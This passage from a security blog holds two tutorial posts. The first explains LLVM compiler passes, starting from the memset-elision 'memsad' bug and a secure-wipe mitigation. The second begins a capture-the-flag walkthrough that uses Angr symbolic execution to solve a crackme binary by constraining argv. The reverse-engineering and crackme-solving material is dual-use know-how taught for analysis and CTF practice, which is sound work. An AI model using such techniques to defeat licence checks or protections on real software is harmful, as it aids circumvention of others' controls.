Of course, if that buffer happens to hold a hash of something sensitive or a private key, this means that when the function returns these values will still be sitting in memory, potentially leaked out to disk during swaps or divulged through any number of kernel memory disclosure vulnerabilities. Either way, if you are serious about controlling access to your crypto, this bug can be a big problem because it means you no longer have a solid grasp of where exactly in your org cryptographic materials are accessible. <br />
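<br />
Here's a hedged C++ sketch of the pattern and one common mitigation. The function names are hypothetical and this is not the RIOT-OS code: use_key_naive wipes a stack buffer with memset right before returning, which is exactly the kind of dead store a compiler may drop, while secure_wipe writes through a volatile-qualified pointer, which GCC and Clang treat as side effects they must keep. Where available, platform helpers such as explicit_bzero (glibc 2.25+ and the BSDs) or SecureZeroMemory (Windows) do the same job.<br />
```cpp
#include <cassert>
#include <cstddef>
#include <cstring>

// Hypothetical stand-in for whatever real work is done with the secret.
static unsigned checksum(const unsigned char *buf, std::size_t len) {
    unsigned sum = 0;
    for (std::size_t i = 0; i < len; ++i) sum += buf[i];
    return sum;
}

// The memsad pattern: `key` is never read after the memset, so an
// optimizing compiler may treat the memset as a dead store and delete it.
unsigned use_key_naive(const unsigned char *secret, std::size_t len) {
    unsigned char key[32] = {0};
    std::memcpy(key, secret, len < sizeof key ? len : sizeof key);
    unsigned result = checksum(key, sizeof key);
    std::memset(key, 0, sizeof key);  // may be optimized away
    return result;
}

// Mitigation sketch: each store goes through a volatile-qualified pointer,
// which compilers treat as an observable side effect and keep.
void secure_wipe(void *buf, std::size_t len) {
    volatile unsigned char *p = static_cast<volatile unsigned char *>(buf);
    while (len--) *p++ = 0;
}

unsigned use_key_wiped(const unsigned char *secret, std::size_t len) {
    unsigned char key[32] = {0};
    std::memcpy(key, secret, len < sizeof key ? len : sizeof key);
    unsigned result = checksum(key, sizeof key);
    secure_wipe(key, sizeof key);  // these stores are kept
    return result;
}
```
To see the difference yourself, compare the assembly of the two functions at -O2 (for example with clang -O2 -S); whether the plain memset actually gets dropped depends on the compiler, its version and the flags.<br />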
<br />
Anyway, the point I'm trying to make here is that the internals of a compiler matter in a security sense. The existence of this bug immediately suggests that other examples exist, at the least as more contrived variants of this one. And to get a view of where these bugs come from, you either trudge through unfriendly compiler code or hook into a framework specifically designed to give you purchase on the internals of the compiler; LLVM is trying to be that framework.<br />
<br />
In order to invoke some of the magic of LLVM, one can write "passes" using the nifty API LLVM exposes. The next section discusses some background on these passes and gets you going with your first one. <br />
<h2 style="text-align: left;">
Your first Pass</h2>
To start, I should say that compilers don't do everything in a single run at your code (<i>well, at least LLVM doesn't</i>); most compilers resort to the simple strategy of doing things in separate "passes" over the code. This effectively means the compiler passes over the code once to achieve a certain goal, and then, once a desired property emerges from the code (<i>like provably correct syntax, efficient array lookups, etc</i>), it is hit with more passes until it is rendered into compiled machine code (<i>or LLVM bitcode if that's your target</i>).<br />
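<br />
A toy model of that idea in C++, entirely separate from LLVM's real classes (ToyPass, run_pipeline and strip_nops are hypothetical names): each pass makes one trip over the whole program, does one job and reports whether it changed anything, and later passes see the program exactly as earlier passes left it.<br />
```cpp
#include <cassert>
#include <functional>
#include <string>
#include <vector>

// Toy "IR": one instruction per string.
using Program = std::vector<std::string>;

// A pass makes one trip over the whole program and reports whether it
// changed anything.
struct ToyPass {
    std::string name;
    std::function<bool(Program &)> run;
};

// Run the passes in order; each one sees the program as the previous
// passes left it. Returns the names of the passes that modified it.
std::vector<std::string> run_pipeline(Program &prog, const std::vector<ToyPass> &passes) {
    std::vector<std::string> changed;
    for (const ToyPass &p : passes) {
        if (p.run(prog)) changed.push_back(p.name);
    }
    return changed;
}

// Example transformation pass: delete "nop" instructions.
bool strip_nops(Program &prog) {
    Program out;
    for (const std::string &inst : prog) {
        if (inst != "nop") out.push_back(inst);
    }
    bool modified = out.size() != prog.size();
    prog = out;
    return modified;
}
```
For example, running strip_nops and then an analysis-only pass that just counts instructions over {"a = 1", "nop", "b = a", "nop"} leaves two instructions, the counting pass sees two, and only strip_nops reports a change.<br />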
<br />
LLVM gives you access to these passes via something called the <b>LLVM Pass Framework</b> (<i>documentation linked below</i>). The way this works is you write a subclass of the <span style="font-family: "courier new" , "courier" , monospace;">llvm::Pass</span> class (in practice, of one of its pass types) with methods that get called for the pass type you chose, and you get to tell it what to do with the code! Pretty cool right? You are literally writing a compiler here, and if that doesn't get you laid then I dunno what will.<br />
<br />
Anyway here's a list of some of the passes LLVM has APIs for:<br />
<ul style="text-align: left;">
<li><b>Module Pass</b> - When you write a module pass, your methods trigger in a context that gives you a view of the entire module (roughly, one .c/.cpp source file) being processed as a single unit. What's neat about the Module Pass is that you can trigger analysis on functions from it. I know this sounds redundant, but imagine trying to process function semantics and, say, needing context on the global variables, or wanting to optimize FunctionPass-specific stuff by first running some analysis from the view of the entire module, i.e. <i>setting up your shadow memory manager, collecting metrics on the module, etc.</i></li>
<li><b>Function Pass</b> - The function pass, as the name indicates, triggers on functions as standalone units. This is obviously very useful, since functions are where the action happens! There are some caveats to using these, though: because of the out-of-order mode of processing, you shouldn't expect to hit the functions in your pass in any given order or make any analysis depend on that order. More important caveats are mentioned on the LLVM site (check out the "Writing an LLVM Pass" documentation linked near the end of this post).</li>
<li><b>Loop Pass</b> - Loop passes run on, you guessed it, loop definitions in context. They process nested loops from the inside out, meaning the outermost loop in a nest is processed last, i.e. loop A{ loop B { loop C } } will be processed C->B->A. These passes are great for performing quick optimizations on loops. For instance, if you're looking for code that may have interesting cache behaviour, you can whip up a loop pass and model what the cache would look like during the loop. Other more obvious applications include simplifying array operations and removing statements that don't affect the computation or that slow the loop down. </li>
</ul>
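<br />
To picture the inside-out order, here's a small C++ model of a loop nest as a tree, walked in post-order so every nested loop is visited before the loop that contains it. It's only a model of the ordering, not LLVM's LoopPass API; Loop and inner_first are hypothetical names, and visiting sibling loops in source order is a choice made by this sketch.<br />
```cpp
#include <cassert>
#include <string>
#include <vector>

// A loop and the loops nested directly inside it.
struct Loop {
    std::string name;
    std::vector<Loop> children;
};

// Post-order walk: every nested loop is visited before the loop that
// contains it, giving the inside-out order. Siblings are visited in
// source order, which is this sketch's choice.
void inner_first(const Loop &loop, std::vector<std::string> &order) {
    for (const Loop &child : loop.children) inner_first(child, order);
    order.push_back(loop.name);
}
```
For the A{ B{ C } } nest above this yields C, B, A; adding a sibling loop D after B inside A gives C, B, D, A.<br />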
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgp9kyQ2UItJP-0FKmTZ48mq72BmqjhpMH6Bm32MWDLObyZ6V8CZ8YE2hHYzTGguIkBFEsxyjGoTb29iel4KZ0p-O8g5U974eYFNH0z_G0gpe6iPlfbBZfdenbDBGGx-QAnPSJypJj4Zg0/s1600/llvm+hiearchy.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="488" data-original-width="379" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgp9kyQ2UItJP-0FKmTZ48mq72BmqjhpMH6Bm32MWDLObyZ6V8CZ8YE2hHYzTGguIkBFEsxyjGoTb29iel4KZ0p-O8g5U974eYFNH0z_G0gpe6iPlfbBZfdenbDBGGx-QAnPSJypJj4Zg0/s400/llvm+hiearchy.png" width="310" /></a></div>
<br />
<br />
There are a few other very powerful pass types I'm not mentioning here for the sake of brevity, namely the <i>RegionPass</i>, <i>CallGraphSCCPass</i> and the <i>MachineFunctionPass</i>. If you need the <i>deets</i> on these, I suggest checking out the LLVM documentation in the reference section.<br />
<br />
The general pattern for employing LLVM to do stuff is to have one part of your code collect data and another analyze it. For instance, let's say you're looking for use-after-frees: you could have one part of your code tag and log all the calls to free() and another part go through these contexts to see if anything funky is going on. The point I'm making here is that, loosely speaking, there is usually a collection phase and an analysis phase. <i>For us these will be a bit compressed in our first example pass, because we're just going to make LLVM tell us the name of every function it processes.</i><br />
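<br />
Here's a hedged C++ sketch of that collect-then-analyze split. It uses a simplified linear trace of alloc/free/use events rather than real LLVM IR, and Event, collect and analyze are hypothetical names. The collection phase records where each pointer was allocated and freed; the analysis phase then flags any use whose most recent free comes after its most recent allocation. A real static analysis also has to deal with control flow and aliasing, which this ignores.<br />
```cpp
#include <cassert>
#include <cstddef>
#include <map>
#include <string>
#include <vector>

// One event in a simplified trace: allocate, free or use a named pointer.
enum class Op { Alloc, Free, Use };
struct Event {
    Op op;
    std::string ptr;
};

// Positions in the trace where a pointer was allocated and freed.
struct Lifetime {
    std::vector<std::size_t> allocs, frees;
};

// Phase 1 (collection): record every alloc and free per pointer.
std::map<std::string, Lifetime> collect(const std::vector<Event> &trace) {
    std::map<std::string, Lifetime> info;
    for (std::size_t i = 0; i < trace.size(); ++i) {
        if (trace[i].op == Op::Alloc) info[trace[i].ptr].allocs.push_back(i);
        if (trace[i].op == Op::Free) info[trace[i].ptr].frees.push_back(i);
    }
    return info;
}

// Latest recorded position strictly before `pos`, or -1 if there is none.
static long last_before(const std::vector<std::size_t> &positions, std::size_t pos) {
    long best = -1;
    for (std::size_t p : positions) {
        if (p < pos) best = static_cast<long>(p);
    }
    return best;
}

// Phase 2 (analysis): flag a use if the pointer's latest free before it
// is more recent than its latest alloc. Returns the flagged trace indices.
std::vector<std::size_t> analyze(const std::vector<Event> &trace,
                                 const std::map<std::string, Lifetime> &info) {
    std::vector<std::size_t> flagged;
    for (std::size_t i = 0; i < trace.size(); ++i) {
        if (trace[i].op != Op::Use) continue;
        auto it = info.find(trace[i].ptr);
        if (it == info.end()) continue;
        if (last_before(it->second.frees, i) > last_before(it->second.allocs, i))
            flagged.push_back(i);
    }
    return flagged;
}
```
On the trace alloc p, use p, free p, use p, alloc p, use p, only the use at index 3 gets flagged.<br />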
<br />
<h2 style="text-align: left;">
The Code</h2>
<br />
Here's the code for our first LLVM pass. Don't fret, I'll explain what's going on right after the code snippet:<br />
<br />
<script src="https://gist.github.com/kh3m616/12f6601f0cdf839d42663876a650a760.js"></script><br />
<br />
Lines 1-6 are pretty straightforward; they just make sure all the relevant namespaces and function definitions are accounted for. More important to discuss is the code on line 9:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;"><b><span class="pl-k">9 struct</span> <span class="pl-en">FunctionNamePass</span> : <span class="pl-k">public</span> <span class="pl-en">FunctionPass</span> {</b></span><br />
<br />
Here we are declaring what kind of pass we want and what it should be called: we're writing a pass of type llvm::<span style="font-family: "courier new" , "courier" , monospace;">FunctionPass</span> called "FunctionNamePass". If you'd like to check out the documentation for the <span style="font-family: "courier new" , "courier" , monospace;">FunctionPass</span> class, it lives in the LLVM Doxygen docs alongside the llvm::Pass class reference listed in the reference section.<br />
<br />
Moving on, we then give it an ID member field so the LLVM Pass Framework can uniquely identify it. Then finally, in lines 13-16, we implement <span style="font-family: "courier new" , "courier" , monospace;">llvm::FunctionPass::runOnFunction(Function &)</span>, which is the star of the show as far as getting stuff done goes. <i>This function is where you put all the analysis you want to do, pull out function calls, check arguments etc etc</i>. The argument passed in here is a reference to a Function object, the current function being analysed, and the bool it returns tells the framework whether the pass modified that function. In line 14 we can see the code do the following:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;"><b><span class="pl-c1">14 errs</span>() << <span class="pl-s"><span class="pl-pds">"</span>[*] function '<span class="pl-pds">"</span></span> << F.<span class="pl-c1">getName</span>() << <span class="pl-s"><span class="pl-pds">"</span>'<span class="pl-cce">\n</span><span class="pl-pds">"</span></span>;</b></span><br />
<br />
This is LLVM's idiom for printing to stderr (via the <b><span style="font-family: "courier new" , "courier" , monospace;">errs()</span></b> call), combined with getting the function name via the nifty <span style="font-family: "courier new" , "courier" , monospace;"><b>Function::getName()</b> </span>method.<br />
<br />
We now have a defined runOnFunction method and we can move onto registering our pass so that clang can pick it up. We're doing this so that we can use the <b><span style="font-family: "courier new" , "courier" , monospace;">clang -Xclang -load -Xclang</span></b> command (<i>more detail on this in the next section</i>) to invoke our pass, though there is an alternative way discussed near the end of the post. Doing things this way makes the story a little shorter and easier to understand. So how do we get clang to see and invoke our pass automatically? We make use of LLVM's Pass registration.<br />
<br />
Here's the code that registers our Pass (lines 24-30):<br />
<br />
<b><span style="font-family: "courier new" , "courier" , monospace;">24 static void registerFunctionNamePass(const PassManagerBuilder&, legacy::PassManagerBase &PM) {</span></b><br />
<br />
<b><span style="font-family: "courier new" , "courier" , monospace;"> PM.add(new FunctionNamePass());</span></b><br />
<br />
<b><span style="font-family: "courier new" , "courier" , monospace;">}</span></b><br />
<br />
<b><span style="font-family: "courier new" , "courier" , monospace;">28 static RegisterStandardPasses</span></b><br />
<b><span style="font-family: "courier new" , "courier" , monospace;">RegisterMyPass(PassManagerBuilder::EP_EarlyAsPossible,</span></b><br />
<b><span style="font-family: "courier new" , "courier" , monospace;">registerFunctionNamePass); </span></b><br />
<br />
Above we can see <span style="font-family: "courier new" , "courier" , monospace;">registerFunctionNamePass</span>, a callback we are defining that will register our pass for us. You can name this anything, of course; the important thing is that it stuffs an instance of our pass into the <span style="font-family: "courier new" , "courier" , monospace;">legacy::PassManagerBase::add( ) </span>function. Next we need to hand our registration callback to the actual pass registration system, which is done by making an instance of <span style="font-family: "courier new" , "courier" , monospace;">RegisterStandardPasses</span> in line 28.<br />
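<br />
The registration trick leans on static initialization: a global object's constructor runs when the program or a shared object containing it is loaded, so just loading the .so is enough to register the callback. The C++ sketch below imitates that pattern with hypothetical names (ToyRegisterPass, registry, build_pipeline); it is an analogue for intuition, not LLVM's actual implementation of RegisterStandardPasses.<br />
```cpp
#include <cassert>
#include <functional>
#include <string>
#include <utility>
#include <vector>

// Stand-in for a pass manager: just the names of the passes added to it.
using ToyPassManager = std::vector<std::string>;
using Callback = std::function<void(ToyPassManager &)>;

// Global list of registration callbacks. A function-local static is
// created on first use, so it exists before any registrar touches it.
std::vector<Callback> &registry() {
    static std::vector<Callback> callbacks;
    return callbacks;
}

// Constructing one of these at namespace scope registers a callback as a
// side effect of static initialization (program start-up, or when a
// shared object containing it is loaded).
struct ToyRegisterPass {
    explicit ToyRegisterPass(Callback cb) { registry().push_back(std::move(cb)); }
};

// Analogue of registerFunctionNamePass: add our pass to the manager we are given.
static void registerToyPass(ToyPassManager &pm) { pm.push_back("FunctionNamePass"); }

// Analogue of the static RegisterStandardPasses object.
static ToyRegisterPass RegisterMyToyPass(registerToyPass);

// What the host (clang, in the real case) does later: let every
// registered callback add its passes.
ToyPassManager build_pipeline() {
    ToyPassManager pm;
    for (const Callback &cb : registry()) cb(pm);
    return pm;
}
```
Calling build_pipeline() returns a list holding just "FunctionNamePass": nobody called registerToyPass by hand, the static registrar did it at start-up.<br />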
<br />
Okay, so that pretty much covers all the important aspects of the pass; we can move on to compiling and running it, which is discussed in the next section.<br />
<h2 style="text-align: left;">
Compiling and Running </h2>
Okay, so our pass is all scripted up; now we need to be able to build and run it. To get that done we're gonna need to set up a folder structure and some CMakeLists.txt files. To skip all the headache involved in this, I suggest checking out a repo that has all of this pre-cooked; I relied on this repo by Adrian Sampson: <a href="https://github.com/sampsyo/llvm-pass-skeleton">https://github.com/sampsyo/llvm-pass-skeleton</a>.<br />
<br />
The top-level CMakeLists.txt expects a folder named FunctionName next to it (FunctionName is what we are renaming the skeleton's Skeleton.cpp to, giving FunctionName/FunctionName.cpp), laid out like so:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">llvm-pass-skeleton</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">├── CMakeLists.txt<br />├── FunctionName<br />│ ├── CMakeLists.txt<br />│ └── FunctionName.cpp</span><br />
Where the top-level llvm-pass-skeleton/CMakeLists.txt looks as follows:<br />
<br />
<script src="https://gist.github.com/kh3m616/e61f04c89a60fc8e47edec1d90654ea5.js"></script><br />
<br />
And the sub-level one, FunctionName/CMakeLists.txt, looks like this:<br />
<br />
<br />
<script src="https://gist.github.com/kh3m616/02ed416b6859722a31cdd641ad108193.js"></script><br />
<br />
Once your folders are set up, you can make your build folder and pump out some cmake and make action:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">cd llvm-pass-skeleton</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">mkdir build</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">cd build</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">cmake ..</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">make</span><br />
<br />
If everything goes well you should see the following output:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">>$ cmake ..<br />-- The C compiler identification is GNU 9.2.1<br />-- The CXX compiler identification is GNU 9.2.1<br />-- Check for working C compiler: /usr/bin/cc<br />-- Check for working C compiler: /usr/bin/cc -- works<br />-- Detecting C compiler ABI info<br />-- Detecting C compiler ABI info - done<br />-- Detecting C compile features<br />-- Detecting C compile features - done<br />-- Check for working CXX compiler: /usr/bin/c++<br />-- Check for working CXX compiler: /usr/bin/c++ -- works<br />-- Detecting CXX compiler ABI info<br />-- Detecting CXX compiler ABI info - done<br />-- Detecting CXX compile features<br />-- Detecting CXX compile features - done<br />-- Configuring done<br />-- Generating done<br />-- Build files have been written to: /home/kh3m/Research/llvm/tutorials/llvm-passes/build</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">>$ make<br />Scanning dependencies of target FunctionNamePass<br />[ 50%] Building CXX object FunctionName/CMakeFiles/FunctionNamePass.dir/FunctionName.cpp.o<br />[100%] Linking CXX shared module libFunctionNamePass.so<br />[100%] Built target FunctionNamePass</span><br />
<br />
We can then run it by invoking the following command:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;"><b>>$ clang -Xclang -load -Xclang FunctionName/libFunctionNamePass.so</b> </span><span style="font-family: "courier new" , "courier" , monospace;"><span style="font-family: "courier new" , "courier" , monospace;">../radamsa.c </span><br />[*] function 'main'<br />[*] function 'find_heap'<br />[*] function 'setup'<br />[*] function 'load_heap'<br />[*] function 'vm'<br />[*] function 'onum'<br />[*] function 'read_heap'<br />[*] function 'heap_metrics'<br />[*] function 'get_obj_metrics'<br />[*] function 'get_nat'<br />[*] function 'set_signal_handler'<br />[*] function 'signal_handler'<br />[*] function 'decode_fasl'<br />[*] function 'get_obj'<br />[*] function 'get_field'<br />[*] function 'mkraw'<br />[*] function 'gc'<br />[*] function 'mkpair'</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">... </span><br />
<br />
<i>You may not have a radamsa.c in your folder; any C code should suffice. I just like using radamsa because it's standalone, doesn't have any complex dependencies and comes packed with all kinds of crazy code to test on. </i><br />
<br />
Alternatively you can invoke your pass by using opt which is the way the LLVM documentation does it, more on that method here: <a href="https://llvm.org/docs/WritingAnLLVMPass.html#running-a-pass-with-opt">https://llvm.org/docs/WritingAnLLVMPass.html#running-a-pass-with-opt</a> <br />
<br />
Okay, I think this is a good place to end this post. We will carry on adding stuff to our pass as the series goes on, so stay tuned! <br />
<h2 style="text-align: left;">
References and Further Reading</h2>
<ol style="text-align: left;">
<li>LLVM For Grad Students - <a href="https://www.cs.cornell.edu/~asampson/blog/llvm.html">https://www.cs.cornell.edu/~asampson/blog/llvm.html</a> </li>
<li>Static Single Assignment (wikipedia) - <a href="https://en.wikipedia.org/wiki/Static_single_assignment_form">https://en.wikipedia.org/wiki/Static_single_assignment_form</a> </li>
<li>llvm::Pass Class Reference abstract - <a href="https://llvm.org/doxygen/classllvm_1_1Pass.html">https://llvm.org/doxygen/classllvm_1_1Pass.html</a></li>
<li>RIOT-OS <a href="https://github.com/RIOT-OS/RIOT/blob/master/sys/crypto/helper.c#L38-L44">https://github.com/RIOT-OS/RIOT/blob/master/sys/crypto/helper.c#L38-L44</a></li>
<li> Memsad why clearing memory is hard. (CCC, 2018) - <a href="https://media.ccc.de/v/35c3-9788-memsad">https://media.ccc.de/v/35c3-9788-memsad</a></li>
<li>LLVM: A Compilation Framework for Lifelong Program Analysis & Transformation (2004) - <a href="https://llvm.org/pubs/2004-01-30-CGO-LLVM.pdf">https://llvm.org/pubs/2004-01-30-CGO-LLVM.pdf</a> </li>
<li>The most dangerous function in the C/C++ world (2015) - <a href="https://www.viva64.com/en/b/0360/">https://www.viva64.com/en/b/0360/</a> </li>
<li>2019 EuroLLVM Developers’ Meeting: V. Bridgers & F. Piovezan “LLVM IR Tutorial - Phis, GEPs ...” - <a href="https://www.youtube.com/watch?v=m8G_S5LwlTo">https://www.youtube.com/watch?v=m8G_S5LwlTo</a> </li>
<li>Loop Optimization Framework - <a href="https://arxiv.org/pdf/1811.00632.pdf">https://arxiv.org/pdf/1811.00632.pdf</a> </li>
<li>LLVM Skeleton Pass (Adrian Sampson) - <a href="https://github.com/sampsyo/llvm-pass-skeleton">https://github.com/sampsyo/llvm-pass-skeleton</a> </li>
</ol>
<br />
<br />
<br />
<br /></div>
Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com0tag:blogger.com,1999:blog-5845671313867906274.post-5151313503608480532019-12-31T10:37:00.000-08:002019-12-31T10:52:37.661-08:00[Symbolic Execution 0x1] Modeling registers and setting constraints<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
Hi folks, in the previous post I covered a simple example showing how Angr can speed up solving keygen / crackme type challenges. In this one I'm explaining how symbolic modeling of registers works with Angr and throwing in a weird little problem that required argv constraints to solve.<br />
<br />
If you're joining us at this post and find yourself a little lost, then please check out the previous one in the series available here:<br />
<br />
<ul style="text-align: left;">
<li><a href="https://blog.k3170makan.com/2019/12/symbolic-execution-0x0-solving-easy.html">[Symbolic Execution 0x0] Solving Easy CTFs with Angr and Symbolic Execution</a></li>
</ul>
<div>
In this series I'm covering some tricks you can pull off with Angr to model execution states and get quick solutions to a few novel CTF challenges. As for this post, we move on to modeling register values as part of our initial state and setting constraints on argv (or any parameter) as part of a solution or initial state.<br />
<br />
<br />
I'm finding that the key to getting really good at Angr is learning the different parts of its vocabulary for describing execution states. It provides tons of ways to set up an execution state at an arbitrary place in a binary and then crunch away until it exhausts all the potential values for the variables you mark off in the "equation". Obviously, the more obscure an execution state you can describe using Angr, the better you'll be able to apply it to malware, rootkits or other contrived binaries.</div>
<h3 style="text-align: left;">
Setting Constraints with Angr</h3>
<div>
<div>
As we know by now, the aim of the game is to describe an execution state that models our targeted place in the binary. Part of the power you have over this initial state is placing constraints on the values you want to search through for your solution. The following example does just that for the argument passed to a binary via argv.</div>
</div>
<div>
<br /></div>
<div>
To start, here's what our binary looks like:</div>
<div>
<br /></div>
</div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgACGAkZ1HfyIiivQSedIbELjazcqUjzomGLoW2EuW8QUWMQlEtJ8iMFYIAAHdFjrcx4QAK9AjPPdhm_HgbODmuRxX-62JmF8bX790PfXs1lKnRz9BFcgB8hS5iLEp8eZ9__s1T2ytL-FI/s1600/Screenshot+from+2019-12-31+08-28-57.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="868" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgACGAkZ1HfyIiivQSedIbELjazcqUjzomGLoW2EuW8QUWMQlEtJ8iMFYIAAHdFjrcx4QAK9AjPPdhm_HgbODmuRxX-62JmF8bX790PfXs1lKnRz9BFcgB8hS5iLEp8eZ9__s1T2ytL-FI/s1600/Screenshot+from+2019-12-31+08-28-57.png" /></a>
<br />
<br />
To make sure we are on the same page with the analysis, here's what you should note:<br />
<br />
<br />
<ul style="text-align: left;">
<li>The first couple of instructions <span style="font-family: Courier New, Courier, monospace;">@0x6d2</span> and <span style="font-family: Courier New, Courier, monospace;">@0x6d5</span> pull the argv pointer and the value of argc. The binary then checks that we have at most (jg instruction<span style="font-family: Courier New, Courier, monospace;"> 0x6dd</span>) 1 argument.</li>
<li>The next code block of interest <span style="font-family: Courier New, Courier, monospace;">@0x6f5</span> ensures that the <span style="font-family: Courier New, Courier, monospace;">argv[1]</span> value is a string of length 5</li>
<li>Then the most crucial check for the purpose of our example happens: from <span style="font-family: Courier New, Courier, monospace;">0x718</span> to <span style="font-family: Courier New, Courier, monospace;">0x72c</span> we can see that the binary ensures that the first character value of the<span style="font-family: Courier New, Courier, monospace;"> argv[1]</span> string is less than <span style="font-family: Courier New, Courier, monospace;">0x40 - 1</span>, which implies that it's looking for <span style="font-family: Courier New, Courier, monospace;">0x3F</span> as a character value.</li>
</ul>
Then it does some weird crap with the <span style="font-family: Courier New, Courier, monospace;">argv[1] </span>string from <span style="font-family: Courier New, Courier, monospace;">0x738 </span>to<span style="font-family: Courier New, Courier, monospace;"> 0x77b</span>, finally deciding (based on <span style="font-family: Courier New, Courier, monospace;">eax</span>) whether we win or not. Again, because of the magic of Angr, we can ignore the entire code block and focus solely on the fact that:<br />
<br />
<ol style="text-align: left;">
<li>It's a "function" of <span style="font-family: Courier New, Courier, monospace;">rbp-0x10 </span>or <span style="font-family: Courier New, Courier, monospace;">argv[1]</span> value.</li>
<li>It requires some attributes to be met for <span style="font-family: Courier New, Courier, monospace;">argv[1]</span> if we are to reach the "weird crap".</li>
</ol>
<br />
We now know enough to model an execution state that will solve for the <span style="font-family: Courier New, Courier, monospace;">argv[1]</span> value. Here's how you do it:<br />
<br />
<script src="https://gist.github.com/k3170makan/e01ee70ec1b99b22be36e5fc53d218fa.js"></script>
<br />
If you've been working through some Angr examples yourself, you shouldn't need a detailed breakdown of every line, and I'm not going to bloat this post by reworking through them either; if you need to catch up, please check out the previous post. The one addition you can see here, though, is in line 14:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">initial_state.add_constraints(argv.get_byte(0) == 0x3F)</span><br />
<br />
To spare you the mystery, this ensures that whatever values Angr trudges through for our earmarked <span style="font-family: Courier New, Courier, monospace;">argv[1] </span>variable, the first byte will be hard set to <span style="font-family: Courier New, Courier, monospace;">0x3F</span>.<br />
<br />
Constraints like this can really speed up your search and stop Angr from running through tons of options that will never produce a solution. So if you're in the business of solving problems quickly and you'd like to show off your skills with Angr (<i>especially because it runs in Python</i>), look out for obvious checks like this; every single character you can squeeze out as an optimization will save you a butt load of time!<br />
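<br />
A rough way to see why pinning even one byte helps: imagine naively enumerating every value of the 5-byte argv[1] from the length check above, where each symbolic byte multiplies the space by 256. Angr actually hands its constraints to an SMT solver (Z3, via claripy) rather than enumerating values one by one, so treat this C++ arithmetic as intuition only; naive_search_space is a hypothetical helper.<br />
```cpp
#include <cassert>
#include <cstdint>

// Size of a naive brute-force search over `len` symbolic bytes (256 values
// each) when `fixed` of them are pinned by constraints.
// Only valid while len - fixed < 8, so the shift fits in 64 bits.
constexpr std::uint64_t naive_search_space(unsigned len, unsigned fixed) {
    return std::uint64_t{1} << (8 * (len - fixed));
}

// argv[1] is 5 bytes long in this challenge.
static_assert(naive_search_space(5, 0) == (std::uint64_t{1} << 40), "no constraints: 2^40");
// Pinning argv[1][0] == 0x3F removes one byte from the search.
static_assert(naive_search_space(5, 1) == (std::uint64_t{1} << 32), "first byte fixed: 2^32");
```
So the single 0x3F constraint cuts the naive space from 2^40 to 2^32 candidates, a factor of 256.<br />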
<br />
Okay, so you probably don't believe me that this will find the solution; I need to provide hard proof! Here's the run:<br />
<div>
<br /></div>
<div class="separator" style="clear: both; font-size: medium; font-weight: 400; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-uVjSkJMo31fmaNaAgZtB2E1OuoUboqhHa8VxuUzWRxldjaihlAOituL6AhJxUxCi3tIadwdp0nMxquLp9NDAuIEtp-S2vjQBIT2bl5b4nMjczPxIu3joGnKjbS4bKHlxxROtK4L5Whk/s1600/Screenshot+from+2019-12-31+08-53-38.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="146" data-original-width="745" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-uVjSkJMo31fmaNaAgZtB2E1OuoUboqhHa8VxuUzWRxldjaihlAOituL6AhJxUxCi3tIadwdp0nMxquLp9NDAuIEtp-S2vjQBIT2bl5b4nMjczPxIu3joGnKjbS4bKHlxxROtK4L5Whk/s1600/Screenshot+from+2019-12-31+08-53-38.png" /></a></div>
<div>
<br />
<i>I know, super obscure value lol, and I'm not even sure the designer of the problem meant for this very strange value to be the actual solution, but that might not matter because the binary clearly likes it and it definitely gets us the flag!</i><br />
<br />
Quite a random place to start, but I thought it eased us into things well. A slightly more complex example follows.<br />
<div style="font-size: medium; font-weight: 400;">
<br /></div>
</div>
<h3>
Modeling Registers</h3>
Registers are an important part of calling conventions. This means that, depending on how you model a binary and how fine a grain you model it at, registers will frequently play a huge role in deciding which function gets which argument.<br />
<br />
To start off, let's look at our example binary:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMm0JmGk9pEYafjxYEU4wPJEE0WjfphQX0uVMrUoMGwJRyrQ7-2D0_3Qi8_JJ5dUrmSgUGLk1ONA4ISCY59WlmBItfc9Rh6BeCZKh1xJpPueupPCUu-s-55BPyu16ai8g0F6YquNGaD3c/s1600/Screenshot+from+2019-12-31+09-19-41.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="767" data-original-width="486" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMm0JmGk9pEYafjxYEU4wPJEE0WjfphQX0uVMrUoMGwJRyrQ7-2D0_3Qi8_JJ5dUrmSgUGLk1ONA4ISCY59WlmBItfc9Rh6BeCZKh1xJpPueupPCUu-s-55BPyu16ai8g0F6YquNGaD3c/s1600/Screenshot+from+2019-12-31+09-19-41.png" /></a></div>
<br />
<br />
and to expand on the <span style="font-family: "courier new" , "courier" , monospace;">get_user_input</span> function:<br />
<br />
